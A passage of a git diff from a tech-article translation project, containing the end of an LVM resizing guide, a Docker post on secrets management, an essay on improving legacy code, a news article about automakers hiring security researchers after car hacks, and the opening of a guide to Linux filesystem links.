+e2label /dev/MyVG01/Stuff Stuff +``` + +### Mount the filesystem + +At this point you can create a mount point, add an appropriate entry to the /etc/fstab file, and mount the filesystem. + +You should also check to verify the volume has been created correctly. You can use the **df**, **lvs,** and **vgs** commands to do this. + +### Resizing a logical volume in an LVM filesystem + +The need to resize a filesystem has been around since the beginning of the first versions of Unix and has not gone away with Linux. It has gotten easier, however, with Logical Volume Management. + +1. If necessary, install a new hard drive. + +2. Optional: Create a partition on the hard drive. + +3. Create a physical volume (PV) of the complete hard drive or a partition on the hard drive. + +4. Assign the new physical volume to an existing volume group (VG) or create a new volume group. + +5. Create one or more logical volumes (LV) from the space in the volume group, or expand an existing logical volume with some or all of the new space in the volume group. + +6. If you created a new logical volume, create a filesystem on it. If adding space to an existing logical volume, use the resize2fs command to enlarge the filesystem to fill the space in the logical volume. + +7. Add appropriate entries to /etc/fstab for mounting the filesystem. + +8. Mount the filesystem. + +### Example + +This example describes how to resize an existing Logical Volume in an LVM environment using the CLI. It adds about 50GB of space to the /Stuff filesystem. This procedure can be used on a mounted, live filesystem only with the Linux 2.6 Kernel (and higher) and EXT3 and EXT4 filesystems. I do not recommend that you do so on any critical system, but it can be done and I have done so many times; even on the root (/) filesystem. Use your judgment. + +WARNING: Only the EXT3 and EXT4 filesystems can be resized on the fly on a running, mounted filesystem. Many other filesystems including BTRFS and ZFS cannot be resized. + +### Install the hard drive + +If there is not enough space on the existing hard drive(s) in the system to add the desired amount of space it may be necessary to add a new hard drive and create the space to add to the Logical Volume. First, install the physical hard drive and then perform the following steps. + +### Create a Physical Volume from the hard drive + +It is first necessary to create a new Physical Volume (PV). Use the command below, which assumes that the new hard drive is assigned as /dev/hdd. + +``` +pvcreate /dev/hdd +``` + +It is not necessary to create a partition of any kind on the new hard drive. This creation of the Physical Volume which will be recognized by the Logical Volume Manager can be performed on a newly installed raw disk or on a Linux partition of type 83\. If you are going to use the entire hard drive, creating a partition first does not offer any particular advantages and uses disk space for metadata that could otherwise be used as part of the PV. + +### Add PV to existing Volume Group + +For this example, we will use the new PV to extend an existing Volume Group. After the Physical Volume has been created, extend the existing Volume Group (VG) to include the space on the new PV. In this example, the existing Volume Group is named MyVG01. + +``` +vgextend /dev/MyVG01 /dev/hdd +``` + +### Extend the Logical Volume + +Extend the Logical Volume (LV) from existing free space within the Volume Group. The command below expands the LV by 50GB. The Volume Group name is MyVG01 and the Logical Volume Name is Stuff. + +``` +lvextend -L +50G /dev/MyVG01/Stuff +``` + +### Expand the filesystem + +Extending the Logical Volume will also expand the filesystem if you use the -r option. If you do not use the -r option, that task must be performed separately. The command below resizes the filesystem to fit the newly resized Logical Volume. + +``` +resize2fs /dev/MyVG01/Stuff +``` + +You should check to verify the resizing has been performed correctly. You can use the **df**, **lvs,** and **vgs** commands to do this. + +### Tips + +Over the years I have learned a few things that can make logical volume management even easier than it already is. Hopefully these tips can prove of some value to you. + +* Use the Extended file systems unless you have a clear reason to use another filesystem. Not all filesystems support resizing but EXT2, 3, and 4 do. The EXT filesystems are also very fast and efficient. In any event, they can be tuned by a knowledgeable sysadmin to meet the needs of most environments if the defaults tuning parameters do not. + +* Use meaningful volume and volume group names. + +* Use EXT filesystem labels. + +I know that, like me, many sysadmins have resisted the change to Logical Volume Management. I hope that this article will encourage you to at least try LVM. I am really glad that I did; my disk management tasks are much easier since I made the switch. + + +### About the author + + [![](https://opensource.com/sites/default/files/styles/profile_pictures/public/david-crop.jpg?itok=oePpOpyV)][10] + + David Both - David Both is a Linux and Open Source advocate who resides in Raleigh, North Carolina. He has been in the IT industry for over forty years and taught OS/2 for IBM where he worked for over 20 years. While at IBM, he wrote the first training course for the original IBM PC in 1981\. He has taught RHCE classes for Red Hat and has worked at MCI Worldcom, Cisco, and the State of North Carolina. He has been working with Linux and Open Source Software for almost 20 years. David has written articles for... [more about David Both][7][More about me][8] + +-------------------------------------------------------------------------------- + +via: https://opensource.com/business/16/9/linux-users-guide-lvm + +作者:[ David Both][a] +译者:[译者ID](https://github.com/译者ID) +校对:[校对者ID](https://github.com/校对者ID) + +本文由 [LCTT](https://github.com/LCTT/TranslateProject) 原创编译,[Linux中国](https://linux.cn/) 荣誉推出 + +[a]:https://opensource.com/users/dboth +[1]:https://opensource.com/resources/what-is-linux?intcmp=70160000000h1jYAAQ&utm_source=intcallout&utm_campaign=linuxcontent +[2]:https://opensource.com/resources/what-are-linux-containers?intcmp=70160000000h1jYAAQ&utm_source=intcallout&utm_campaign=linuxcontent +[3]:https://developers.redhat.com/promotions/linux-cheatsheet/?intcmp=70160000000h1jYAAQ&utm_source=intcallout&utm_campaign=linuxcontent +[4]:https://developers.redhat.com/cheat-sheet/advanced-linux-commands-cheatsheet?intcmp=70160000000h1jYAAQ&utm_source=intcallout&utm_campaign=linuxcontent +[5]:https://opensource.com/tags/linux?intcmp=70160000000h1jYAAQ&utm_source=intcallout&utm_campaign=linuxcontent +[6]:https://opensource.com/business/16/9/linux-users-guide-lvm?rate=79vf1js7A7rlp-I96YFneopUQqsa2SuB-g-og7eiF1U +[7]:https://opensource.com/users/dboth +[8]:https://opensource.com/users/dboth +[9]:https://opensource.com/user/14106/feed +[10]:https://opensource.com/users/dboth +[11]:https://opensource.com/users/dboth +[12]:https://opensource.com/users/dboth +[13]:https://opensource.com/business/16/9/linux-users-guide-lvm#comments +[14]:https://opensource.com/tags/business +[15]:https://opensource.com/tags/linux +[16]:https://opensource.com/tags/how-tos-and-tutorials +[17]:https://opensource.com/tags/sysadmin diff --git a/sources/tech/20170209 INTRODUCING DOCKER SECRETS MANAGEMENT.md b/sources/tech/20170209 INTRODUCING DOCKER SECRETS MANAGEMENT.md new file mode 100644 index 0000000000..a3fc2c886e --- /dev/null +++ b/sources/tech/20170209 INTRODUCING DOCKER SECRETS MANAGEMENT.md @@ -0,0 +1,110 @@ +INTRODUCING DOCKER SECRETS MANAGEMENT +============================================================ + +Containers are changing how we view apps and infrastructure. Whether the code inside containers is big or small, container architecture introduces a change to how that code behaves with hardware – it fundamentally abstracts it from the infrastructure. Docker believes that there are three key components to container security and together they result in inherently safer apps. + + ![Docker Security](https://i2.wp.com/blog.docker.com/wp-content/uploads/e12387a1-ab21-4942-8760-5b1677bc656d-1.jpg?w=1140&ssl=1) + +A critical element of building safer apps is having a secure way of communicating with other apps and systems, something that often requires credentials, tokens, passwords and other types of confidential information—usually referred to as application secrets. We are excited to introduce Docker Secrets, a container native solution that strengthens the Trusted Delivery component of container security by integrating secret distribution directly into the container platform. + +With containers, applications are now dynamic and portable across multiple environments. This  made existing secrets distribution solutions inadequate because they were largely designed for static environments. Unfortunately, this led to an increase in mismanagement of application secrets, making it common to find insecure, home-grown solutions, such as embedding secrets into version control systems like GitHub, or other equally bad—bolted on point solutions as an afterthought. + +### Introducing Docker Secrets Management + +We fundamentally believe that apps are safer if there is a standardized interface for accessing secrets. Any good solution will also have to follow security best practices, such as encrypting secrets while in transit; encrypting secrets at rest; preventing secrets from unintentionally leaking when consumed by the final application; and strictly adhere to the principle of least-privilege, where an application only has access to the secrets that it needs—no more, no less. + +By integrating secrets into Docker orchestration, we are able to deliver a solution for the secrets management problem that follows these exact principles. + +The following diagram provides a high-level view of how the Docker swarm mode architecture is applied to securely deliver a new type of object to our containers: a secret object. + + ![Docker Secrets Management](https://i0.wp.com/blog.docker.com/wp-content/uploads/b69d2410-9e25-44d8-aa2d-f67b795ff5e3.jpg?w=1140&ssl=1) + +In Docker, a secret is any blob of data, such as a password, SSH private key, TLS Certificate, or any other piece of data that is sensitive in nature. When you add a secret to the swarm (by running `docker secret create`), Docker sends the secret over to the swarm manager over a mutually authenticated TLS connection, making use of the [built-in Certificate Authority][17] that gets automatically created when bootstrapping a new swarm. + +``` +$ echo "This is a secret" | docker secret create my_secret_data - +``` + +Once the secret reaches a manager node, it gets saved to the internal Raft store, which uses NACL’s Salsa20Poly1305 with a 256-bit key to ensure no data is ever written to disk unencrypted. Writing to the internal store gives secrets the same high availability guarantees that the the rest of the swarm management data gets. + +When a swarm manager starts up, the encrypted Raft logs containing the secrets is decrypted using a data encryption key that is unique per-node. This key, and the node’s TLS credentials used to communicate with the rest of the cluster, can be encrypted with a cluster-wide key encryption key, called the unlock key, which is also propagated using Raft and will be required on manager start. + +When you grant a newly-created or running service access to a secret, one of the manager nodes (only managers have access to all the stored secrets stored) will send it over the already established TLS connection exclusively to the nodes that will be running that specific service. This means that nodes cannot request the secrets themselves, and will only gain access to the secrets when provided to them by a manager – strictly for the services that require them. + +``` +$ docker service  create --name="redis" --secret="my_secret_data" redis:alpine +``` + +The  unencrypted secret is mounted into the container in an in-memory filesystem at /run/secrets/. + +``` +$ docker exec $(docker ps --filter name=redis -q) ls -l /run/secrets +total 4 +-r--r--r--    1 root     root            17 Dec 13 22:48 my_secret_data +``` + +If a service gets deleted, or rescheduled somewhere else, the manager will immediately notify all the nodes that no longer require access to that secret to erase it from memory, and the node will no longer have any access to that application secret. + +``` +$ docker service update --secret-rm="my_secret_data" redis + +$ docker exec -it $(docker ps --filter name=redis -q) cat /run/secrets/my_secret_data + +cat: can't open '/run/secrets/my_secret_data': No such file or directory +``` + +Check out the [Docker secrets docs][18] for more information and examples on how to create and manage your secrets. And a special shout out to Laurens Van Houtven (https://www.lvh.io/[)][19] in collaboration with the Docker security and core engineering team to help make this feature a reality. + +[Get safer apps for dev and ops w/ new #Docker secrets management][5] + +[CLICK TO TWEET][6] + +### +![Docker Security](https://i2.wp.com/blog.docker.com/wp-content/uploads/Screenshot-2017-02-08-23.30.13.png?resize=1032%2C111&ssl=1) + +### Safer Apps with Docker + +Docker secrets is designed to be easily usable by developers and IT ops teams to build and run safer apps. Docker secrets is a container first architecture designed to keep secrets safe and used only when needed by the exact container that needs that secret to operate. From defining apps and secrets with Docker Compose through an IT admin deploying that Compose file directly in Docker Datacenter, the services, secrets, networks and volumes will travel securely, safely with the application. + +Resources to learn more: + +* [Docker Datacenter on 1.13 with Secrets, Security Scanning, Content Cache and More][7] + +* [Download Docker][8] and get started today + +* [Try secrets in Docker Datacenter][9] + +* [Read the Documentation][10] + +* Attend an [upcoming webinar][11] + +-------------------------------------------------------------------------------- + +via: https://blog.docker.com/2017/02/docker-secrets-management/ + +作者:[ Ying Li][a] +译者:[译者ID](https://github.com/译者ID) +校对:[校对者ID](https://github.com/校对者ID) + +本文由 [LCTT](https://github.com/LCTT/TranslateProject) 原创编译,[Linux中国](https://linux.cn/) 荣誉推出 + +[a]:https://blog.docker.com/author/yingli/ +[1]:http://www.linkedin.com/shareArticle?mini=true&url=http://dockr.ly/2k6gnOB&title=Introducing%20Docker%20Secrets%20Management&summary=Containers%20are%20changing%20how%20we%20view%20apps%20and%20infrastructure.%20Whether%20the%20code%20inside%20containers%20is%20big%20or%20small,%20container%20architecture%20introduces%20a%20change%20to%20how%20that%20code%20behaves%20with%20hardware%20-%20it%20fundamentally%20abstracts%20it%20from%20the%20infrastructure.%20Docker%20believes%20that%20there%20are%20three%20key%20components%20to%20container%20security%20and%20... +[2]:http://www.reddit.com/submit?url=http://dockr.ly/2k6gnOB&title=Introducing%20Docker%20Secrets%20Management +[3]:https://plus.google.com/share?url=http://dockr.ly/2k6gnOB +[4]:http://news.ycombinator.com/submitlink?u=http://dockr.ly/2k6gnOB&t=Introducing%20Docker%20Secrets%20Management +[5]:https://twitter.com/share?text=Get+safer+apps+for+dev+and+ops+w%2F+new+%23Docker+secrets+management+&via=docker&related=docker&url=http://dockr.ly/2k6gnOB +[6]:https://twitter.com/share?text=Get+safer+apps+for+dev+and+ops+w%2F+new+%23Docker+secrets+management+&via=docker&related=docker&url=http://dockr.ly/2k6gnOB +[7]:http://dockr.ly/AppSecurity +[8]:https://www.docker.com/getdocker +[9]:http://www.docker.com/trial +[10]:https://docs.docker.com/engine/swarm/secrets/ +[11]:http://www.docker.com/webinars +[12]:https://blog.docker.com/author/yingli/ +[13]:https://blog.docker.com/tag/container-security/ +[14]:https://blog.docker.com/tag/docker-security/ +[15]:https://blog.docker.com/tag/secrets-management/ +[16]:https://blog.docker.com/tag/security/ +[17]:https://docs.docker.com/engine/swarm/how-swarm-mode-works/pki/ +[18]:https://docs.docker.com/engine/swarm/secrets/ +[19]:https://lvh.io%29/ diff --git a/sources/tech/20170530 How to Improve a Legacy Codebase.md b/sources/tech/20170530 How to Improve a Legacy Codebase.md deleted file mode 100644 index cff5e70538..0000000000 --- a/sources/tech/20170530 How to Improve a Legacy Codebase.md +++ /dev/null @@ -1,108 +0,0 @@ -Translating by aiwhj -# How to Improve a Legacy Codebase - - -It happens at least once in the lifetime of every programmer, project manager or teamleader. You get handed a steaming pile of manure, if you’re lucky only a few million lines worth, the original programmers have long ago left for sunnier places and the documentation - if there is any to begin with - is hopelessly out of sync with what is presently keeping the company afloat. - -Your job: get us out of this mess. - -After your first instinctive response (run for the hills) has passed you start on the project knowing full well that the eyes of the company senior leadership are on you. Failure is not an option. And yet, by the looks of what you’ve been given failure is very much in the cards. So what to do? - -I’ve been (un)fortunate enough to be in this situation several times and me and a small band of friends have found that it is a lucrative business to be able to take these steaming piles of misery and to turn them into healthy maintainable projects. Here are some of the tricks that we employ: - -### Backup - -Before you start to do anything at all make a backup of  _everything_  that might be relevant. This to make sure that no information is lost that might be of crucial importance somewhere down the line. All it takes is a silly question that you can’t answer to eat up a day or more once the change has been made. Especially configuration data is susceptible to this kind of problem, it is usually not versioned and you’re lucky if it is taken along in the periodic back-up scheme. So better safe than sorry, copy everything to a very safe place and never ever touch that unless it is in read-only mode. - -### Important pre-requisite, make sure you have a build process and that it actually produces what runs in production - -I totally missed this step on the assumption that it is obvious and likely already in place but many HN commenters pointed this out and they are absolutely right: step one is to make sure that you know what is running in production right now and that means that you need to be able to build a version of the software that is - if your platform works that way - byte-for-byte identical with the current production build. If you can’t find a way to achieve this then likely you will be in for some unpleasant surprises once you commit something to production. Make sure you test this to the best of your ability to make sure that you have all the pieces in place and then, after you’ve gained sufficient confidence that it will work move it to production. Be prepared to switch back immediately to whatever was running before and make sure that you log everything and anything that might come in handy during the - inevitable - post mortem. - -### Freeze the DB - -If at all possible freeze the database schema until you are done with the first level of improvements, by the time you have a solid understanding of the codebase and the legacy code has been fully left behind you are ready to modify the database schema. Change it any earlier than that and you may have a real problem on your hand, now you’ve lost the ability to run an old and a new codebase side-by-side with the database as the steady foundation to build on. Keeping the DB totally unchanged allows you to compare the effect your new business logic code has compared to the old business logic code, if it all works as advertised there should be no differences. - -### Write your tests - -Before you make any changes at all write as many end-to-end and integration tests as you can. Make sure these tests produce the right output and test any and all assumptions that you can come up with about how you  _think_  the old stuff works (be prepared for surprises here). These tests will have two important functions: they will help to clear up any misconceptions at a very early stage and they will function as guardrails once you start writing new code to replace old code. - -Automate all your testing, if you’re already experienced with CI then use it and make sure your tests run fast enough to run the full set of tests after every commit. - -### Instrumentation and logging - -If the old platform is still available for development add instrumentation. Do this in a completely new database table, add a simple counter for every event that you can think of and add a single function to increment these counters based on the name of the event. That way you can implement a time-stamped event log with a few extra lines of code and you’ll get a good idea of how many events of one kind lead to events of another kind. One example: User opens app, User closes app. If two events should result in some back-end calls those two counters should over the long term remain at a constant difference, the difference is the number of apps currently open. If you see many more app opens than app closes you know there has to be a way in which apps end (for instance a crash). For each and every event you’ll find there is some kind of relationship to other events, usually you will strive for constant relationships unless there is an obvious error somewhere in the system. You’ll aim to reduce those counters that indicate errors and you’ll aim to maximize counters further down in the chain to the level indicated by the counters at the beginning. (For instance: customers attempting to pay should result in an equal number of actual payments received). - -This very simple trick turns every backend application into a bookkeeping system of sorts and just like with a real bookkeeping system the numbers have to match, as long as they don’t you have a problem somewhere. - -This system will over time become invaluable in establishing the health of the system and will be a great companion next to the source code control system revision log where you can determine the point in time that a bug was introduced and what the effect was on the various counters. - -I usually keep these counters at a 5 minute resolution (so 12 buckets for an hour), but if you have an application that generates fewer or more events then you might decide to change the interval at which new buckets are created. All counters share the same database table and so each counter is simply a column in that table. - -### Change only one thing at the time - -Do not fall into the trap of improving both the maintainability of the code or the platform it runs on at the same time as adding new features or fixing bugs. This will cause you huge headaches because you now have to ask yourself every step of the way what the desired outcome is of an action and will invalidate some of the tests you made earlier. - -### Platform changes - -If you’ve decided to migrate the application to another platform then do this first  _but keep everything else exactly the same_ . If you want you can add more documentation or tests, but no more than that, all business logic and interdependencies should remain as before. - -### Architecture changes - -The next thing to tackle is to change the architecture of the application (if desired). At this point in time you are free to change the higher level structure of the code, usually by reducing the number of horizontal links between modules, and thus reducing the scope of the code active during any one interaction with the end-user. If the old code was monolithic in nature now would be a good time to make it more modular, break up large functions into smaller ones but leave names of variables and data-structures as they were. - -HN user [mannykannot][1] points - rightfully - out that this is not always an option, if you’re particularly unlucky then you may have to dig in deep in order to be able to make any architecture changes. I agree with that and I should have included it here so hence this little update. What I would further like to add is if you do both do high level changes and low level changes at least try to limit them to one file or worst case one subsystem so that you limit the scope of your changes as much as possible. Otherwise you might have a very hard time debugging the change you just made. - -### Low level refactoring - -By now you should have a very good understanding of what each module does and you are ready for the real work: refactoring the code to improve maintainability and to make the code ready for new functionality. This will likely be the part of the project that consumes the most time, document as you go, do not make changes to a module until you have thoroughly documented it and feel you understand it. Feel free to rename variables and functions as well as datastructures to improve clarity and consistency, add tests (also unit tests, if the situation warrants them). - -### Fix bugs - -Now you’re ready to take on actual end-user visible changes, the first order of battle will be the long list of bugs that have accumulated over the years in the ticket queue. As usual, first confirm the problem still exists, write a test to that effect and then fix the bug, your CI and the end-to-end tests written should keep you safe from any mistakes you make due to a lack of understanding or some peripheral issue. - -### Database Upgrade - -If required after all this is done and you are on a solid and maintainable codebase again you have the option to change the database schema or to replace the database with a different make/model altogether if that is what you had planned to do. All the work you’ve done up to this point will help to assist you in making that change in a responsible manner without any surprises, you can completely test the new DB with the new code and all the tests in place to make sure your migration goes off without a hitch. - -### Execute on the roadmap - -Congratulations, you are out of the woods and are now ready to implement new functionality. - -### Do not ever even attempt a big-bang rewrite - -A big-bang rewrite is the kind of project that is pretty much guaranteed to fail. For one, you are in uncharted territory to begin with so how would you even know what to build, for another, you are pushing  _all_  the problems to the very last day, the day just before you go ‘live’ with your new system. And that’s when you’ll fail, miserably. Business logic assumptions will turn out to be faulty, suddenly you’ll gain insight into why that old system did certain things the way it did and in general you’ll end up realizing that the guys that put the old system together weren’t maybe idiots after all. If you really do want to wreck the company (and your own reputation to boot) by all means, do a big-bang rewrite, but if you’re smart about it this is not even on the table as an option. - -### So, the alternative, work incrementally - -To untangle one of these hairballs the quickest path to safety is to take any element of the code that you do understand (it could be a peripheral bit, but it might also be some core module) and try to incrementally improve it still within the old context. If the old build tools are no longer available you will have to use some tricks (see below) but at least try to leave as much of what is known to work alive while you start with your changes. That way as the codebase improves so does your understanding of what it actually does. A typical commit should be at most a couple of lines. - -### Release! - -Every change along the way gets released into production, even if the changes are not end-user visible it is important to make the smallest possible steps because as long as you lack understanding of the system there is a fair chance that only the production environment will tell you there is a problem. If that problem arises right after you make a small change you will gain several advantages: - -* it will probably be trivial to figure out what went wrong - -* you will be in an excellent position to improve the process - -* and you should immediately update the documentation to show the new insights gained - -### Use proxies to your advantage - -If you are doing web development praise the gods and insert a proxy between the end-users and the old system. Now you have per-url control over which requests go to the old system and which you will re-route to the new system allowing much easier and more granular control over what is run and who gets to see it. If your proxy is clever enough you could probably use it to send a percentage of the traffic to the new system for an individual URL until you are satisfied that things work the way they should. If your integration tests also connect to this interface it is even better. - -### Yes, but all this will take too much time! - -Well, that depends on how you look at it. It’s true there is a bit of re-work involved in following these steps. But it  _does_  work, and any kind of optimization of this process makes the assumption that you know more about the system than you probably do. I’ve got a reputation to maintain and I  _really_  do not like negative surprises during work like this. With some luck the company is already on the skids, or maybe there is a real danger of messing things up for the customers. In a situation like that I prefer total control and an iron clad process over saving a couple of days or weeks if that imperils a good outcome. If you’re more into cowboy stuff - and your bosses agree - then maybe it would be acceptable to take more risk, but most companies would rather take the slightly slower but much more sure road to victory. - --------------------------------------------------------------------------------- - -via: https://jacquesmattheij.com/improving-a-legacy-codebase - -作者:[Jacques Mattheij ][a] -译者:[译者ID](https://github.com/译者ID) -校对:[校对者ID](https://github.com/校对者ID) - -本文由 [LCTT](https://github.com/LCTT/TranslateProject) 原创编译,[Linux中国](https://linux.cn/) 荣誉推出 - -[a]:https://jacquesmattheij.com/ -[1]:https://news.ycombinator.com/item?id=14445661 diff --git a/sources/tech/20170607 Why Car Companies Are Hiring Computer Security Experts.md b/sources/tech/20170607 Why Car Companies Are Hiring Computer Security Experts.md new file mode 100644 index 0000000000..4a7d23e5f0 --- /dev/null +++ b/sources/tech/20170607 Why Car Companies Are Hiring Computer Security Experts.md @@ -0,0 +1,91 @@ +Why Car Companies Are Hiring Computer Security Experts +============================================================ + +Photo +![](https://static01.nyt.com/images/2017/06/08/business/08BITS-GURUS1/08BITS-GURUS1-superJumbo.jpg) +The cybersecurity experts Marc Rogers, left, of CloudFlare and Kevin Mahaffey of Lookout were able to control various Tesla functions from their physically connected laptop. They pose in CloudFlare’s lobby in front of Lava Lamps used to generate numbers for encryption.CreditChristie Hemm Klok for The New York Times + +It started about seven years ago. Iran’s top nuclear scientists were being assassinated in a string of similar attacks: Assailants on motorcycles were pulling up to their moving cars, attaching magnetic bombs and detonating them after the motorcyclists had fled the scene. + +In another seven years, security experts warn, assassins won’t need motorcycles or magnetic bombs. All they’ll need is a laptop and code to send driverless cars careering off a bridge, colliding with a driverless truck or coming to an unexpected stop in the middle of fast-moving traffic. + +Automakers may call them self-driving cars. But hackers call them computers that travel over 100 miles an hour. + +“These are no longer cars,” said Marc Rogers, the principal security researcher at the cybersecurity firm CloudFlare. “These are data centers on wheels. Any part of the car that talks to the outside world is a potential inroad for attackers.” + +Those fears came into focus two years ago when two “white hat” hackers — researchers who look for computer vulnerabilities to spot problems and fix them, rather than to commit a crime or cause problems — successfully gained access to a Jeep Cherokee from their computer miles away. They rendered their crash-test dummy (in this case a nervous reporter) powerless over his vehicle and disabling his transmission in the middle of a highway. + +The hackers, Chris Valasek and Charlie Miller (now security researchers respectively at Uber and Didi, an Uber competitor in China), discovered an [electronic route from the Jeep’s entertainment system to its dashboard][10]. From there, they had control of the vehicle’s steering, brakes and transmission — everything they needed to paralyze their crash test dummy in the middle of a highway. + +“Car hacking makes great headlines, but remember: No one has ever had their car hacked by a bad guy,” Mr. Miller wrote on Twitter last Sunday. “It’s only ever been performed by researchers.” + +Still, the research by Mr. Miller and Mr. Valasek came at a steep price for Jeep’s manufacturer, Fiat Chrysler, which was forced to recall 1.4 million of its vehicles as a result of the hacking experiment. + +It is no wonder that Mary Barra, the chief executive of General Motors, called cybersecurity her company’s top priority last year. Now the skills of researchers and so-called white hat hackers are in high demand among automakers and tech companies pushing ahead with driverless car projects. + +Uber, [Tesla][11], Apple and Didi in China have been actively recruiting white hat hackers like Mr. Miller and Mr. Valasek from one another as well as from traditional cybersecurity firms and academia. + +Last year, Tesla poached Aaron Sigel, Apple’s manager of security for its iOS operating system. Uber poached Chris Gates, formerly a white hat hacker at Facebook. Didi poached Mr. Miller from Uber, where he had gone to work after the Jeep hack. And security firms have seen dozens of engineers leave their ranks for autonomous-car projects. + +Mr. Miller said he left Uber for Didi, in part, because his new Chinese employer has given him more freedom to discuss his work. + +“Carmakers seem to be taking the threat of cyberattack more seriously, but I’d still like to see more transparency from them,” Mr. Miller wrote on Twitter on Saturday. + +Like a number of big tech companies, Tesla and Fiat Chrysler started paying out rewards to hackers who turn over flaws the hackers discover in their systems. GM has done something similar, though critics say GM’s program is limited when compared with the ones offered by tech companies, and so far no rewards have been paid out. + +One year after the Jeep hack by Mr. Miller and Mr. Valasek, they demonstrated all the other ways they could mess with a Jeep driver, including hijacking the vehicle’s cruise control, swerving the steering wheel 180 degrees or slamming on the parking brake in high-speed traffic — all from a computer in the back of the car. (Those exploits ended with their test Jeep in a ditch and calls to a local tow company.) + +Granted, they had to be in the Jeep to make all that happen. But it was evidence of what is possible. + +The Jeep penetration was preceded by a [2011 hack by security researchers at the University of Washington][12] and the University of California, San Diego, who were the first to remotely hack a sedan and ultimately control its brakes via Bluetooth. The researchers warned car companies that the more connected cars become, the more likely they are to get hacked. + +Security researchers have also had their way with Tesla’s software-heavy Model S car. In 2015, Mr. Rogers, together with Kevin Mahaffey, the chief technology officer of the cybersecurity company Lookout, found a way to control various Tesla functions from their physically connected laptop. + +One year later, a team of Chinese researchers at Tencent took their research a step further, hacking a moving Tesla Model S and controlling its brakes from 12 miles away. Unlike Chrysler, Tesla was able to dispatch a remote patch to fix the security holes that made the hacks possible. + +In all the cases, the car hacks were the work of well meaning, white hat security researchers. But the lesson for all automakers was clear. + +The motivations to hack vehicles are limitless. When it learned of Mr. Rogers’s and Mr. Mahaffey’s investigation into Tesla’s Model S, a Chinese app-maker asked Mr. Rogers if he would be interested in sharing, or possibly selling, his discovery, he said. (The app maker was looking for a backdoor to secretly install its app on Tesla’s dashboard.) + +Criminals have not yet shown they have found back doors into connected vehicles, though for years, they have been actively developing, trading and deploying tools that can intercept car key communications. + +But as more driverless and semiautonomous cars hit the open roads, they will become a more worthy target. Security experts warn that driverless cars present a far more complex, intriguing and vulnerable “attack surface” for hackers. Each new “connected” car feature introduces greater complexity, and with complexity inevitably comes vulnerability. + +Twenty years ago, cars had, on average, one million lines of code. The General Motors 2010 [Chevrolet Volt][13] had about 10 million lines of code — more than an [F-35 fighter jet][14]. + +Today, an average car has more than 100 million lines of code. Automakers predict it won’t be long before they have 200 million. When you stop to consider that, on average, there are 15 to 50 defects per 1,000 lines of software code, the potentially exploitable weaknesses add up quickly. + +The only difference between computer code and driverless car code is that, “Unlike data center enterprise security — where the biggest threat is loss of data — in automotive security, it’s loss of life,” said David Barzilai, a co-founder of Karamba Security, an Israeli start-up that is working on addressing automotive security. + +To truly secure autonomous vehicles, security experts say, automakers will have to address the inevitable vulnerabilities that pop up in new sensors and car computers, address inherent vulnerabilities in the base car itself and, perhaps most challenging of all, bridge the cultural divide between automakers and software companies. + +“The genie is out of the bottle, and to solve this problem will require a major cultural shift,” said Mr. Mahaffey of the cybersecurity company Lookout. “And an automaker that truly values cybersecurity will treat security vulnerabilities the same they would an airbag recall. We have not seen that industrywide shift yet.” + +There will be winners and losers, Mr. Mahaffey added: “Automakers that transform themselves into software companies will win. Others will get left behind.” + +-------------------------------------------------------------------------------- + +via: https://www.nytimes.com/2017/06/07/technology/why-car-companies-are-hiring-computer-security-experts.html + +作者:[NICOLE PERLROTH ][a] +译者:[译者ID](https://github.com/译者ID) +校对:[校对者ID](https://github.com/校对者ID) + +本文由 [LCTT](https://github.com/LCTT/TranslateProject) 原创编译,[Linux中国](https://linux.cn/) 荣誉推出 + +[a]:https://www.nytimes.com/by/nicole-perlroth +[1]:https://www.nytimes.com/2016/06/09/technology/software-as-weaponry-in-a-computer-connected-world.html +[2]:https://www.nytimes.com/2015/08/29/technology/uber-hires-two-engineers-who-showed-cars-could-be-hacked.html +[3]:https://www.nytimes.com/2015/08/11/opinion/zeynep-tufekci-why-smart-objects-may-be-a-dumb-idea.html +[4]:https://www.nytimes.com/by/nicole-perlroth +[5]:https://www.nytimes.com/column/bits +[6]:https://www.nytimes.com/2017/06/07/technology/why-car-companies-are-hiring-computer-security-experts.html?utm_source=wanqu.co&utm_campaign=Wanqu+Daily&utm_medium=website#story-continues-1 +[7]:http://www.nytimes.com/newsletters/sample/bits?pgtype=subscriptionspage&version=business&contentId=TU&eventName=sample&module=newsletter-sign-up +[8]:https://www.nytimes.com/privacy +[9]:https://www.nytimes.com/help/index.html +[10]:https://bits.blogs.nytimes.com/2015/07/21/security-researchers-find-a-way-to-hack-cars/ +[11]:http://www.nytimes.com/topic/company/tesla-motors-inc?inline=nyt-org +[12]:http://www.autosec.org/pubs/cars-usenixsec2011.pdf +[13]:http://autos.nytimes.com/2011/Chevrolet/Volt/238/4117/329463/researchOverview.aspx?inline=nyt-classifier +[14]:http://topics.nytimes.com/top/reference/timestopics/subjects/m/military_aircraft/f35_airplane/index.html?inline=nyt-classifier +[15]:https://www.nytimes.com/2017/06/07/technology/why-car-companies-are-hiring-computer-security-experts.html?utm_source=wanqu.co&utm_campaign=Wanqu+Daily&utm_medium=website#story-continues-3 diff --git a/sources/tech/20170622 A users guide to links in the Linux filesystem.md b/sources/tech/20170622 A users guide to links in the Linux filesystem.md deleted file mode 100644 index 3cb59aaacb..0000000000 --- a/sources/tech/20170622 A users guide to links in the Linux filesystem.md +++ /dev/null @@ -1,314 +0,0 @@ -Translating by yongshouzhang - - -A user's guide to links in the Linux filesystem -============================================================ - -### Learn how to use links, which make tasks easier by providing access to files from multiple locations in the Linux filesystem directory tree. - - -![A user's guide to links in the Linux filesystem](https://opensource.com/sites/default/files/styles/image-full-size/public/images/life/links.png?itok=AumNmse7 "A user's guide to links in the Linux filesystem") -Image by : [Paul Lewin][8]. Modified by Opensource.com. [CC BY-SA 2.0][9] - -In articles I have written about various aspects of Linux filesystems for Opensource.com, including [An introduction to Linux's EXT4 filesystem][10]; [Managing devices in Linux][11]; [An introduction to Linux filesystems][12]; and [A Linux user's guide to Logical Volume Management][13], I have briefly mentioned an interesting feature of Linux filesystems that can make some tasks easier by providing access to files from multiple locations in the filesystem directory tree. - -There are two types of Linux filesystem links: hard and soft. The difference between the two types of links is significant, but both types are used to solve similar problems. They both provide multiple directory entries (or references) to a single file, but they do it quite differently. Links are powerful and add flexibility to Linux filesystems because [everything is a file][14]. - -More Linux resources - -* [What is Linux?][1] - -* [What are Linux containers?][2] - -* [Download Now: Linux commands cheat sheet][3] - -* [Advanced Linux commands cheat sheet][4] - -* [Our latest Linux articles][5] - -I have found, for instance, that some programs required a particular version of a library. When a library upgrade replaced the old version, the program would 